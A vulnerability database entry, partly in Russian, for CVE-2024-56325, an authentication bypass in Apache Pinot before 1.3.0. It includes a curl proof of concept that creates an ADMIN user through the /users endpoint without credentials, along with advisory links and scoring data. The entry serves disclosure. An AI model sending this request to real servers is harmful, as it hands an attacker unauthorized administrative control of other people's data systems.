CVE-2024-56325

Опубликовано: 01 апр. 2025

Источник: nvd

CVSS3: 9.8

EPSS Средний

Описание

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

Ссылки

https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
Mailing List
Vendor Advisory
http://www.openwall.com/lists/oss-security/2025/03/27/8
Mailing List
Third Party Advisory

Уязвимые конфигурации

Конфигурация 1

cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:*

Версия до 1.3.0 (исключая)

EPSS

Процентиль: 97%

0.30769

Средний

9.8 Critical

CVSS3

Дефекты

CWE-288

Связанные уязвимости

GHSA-6jwp-4wvj-6597

CVSS3: 9.8

github

10 месяцев назад

Apache Pinot Vulnerable to Authentication Bypass

BDU:2025-02929

CVSS3: 9.8

fstec

больше 1 года назад

Уязвимость класса AuthenticationFilter OLAP-хранилища данных Apache Pinot, позволяющая нарушителю оказать влияние на конфиденциальность, целостность и доступность защищаемой информации

EPSS

Процентиль: 97%

0.30769

Средний

9.8 Critical

CVSS3

Дефекты

CWE-288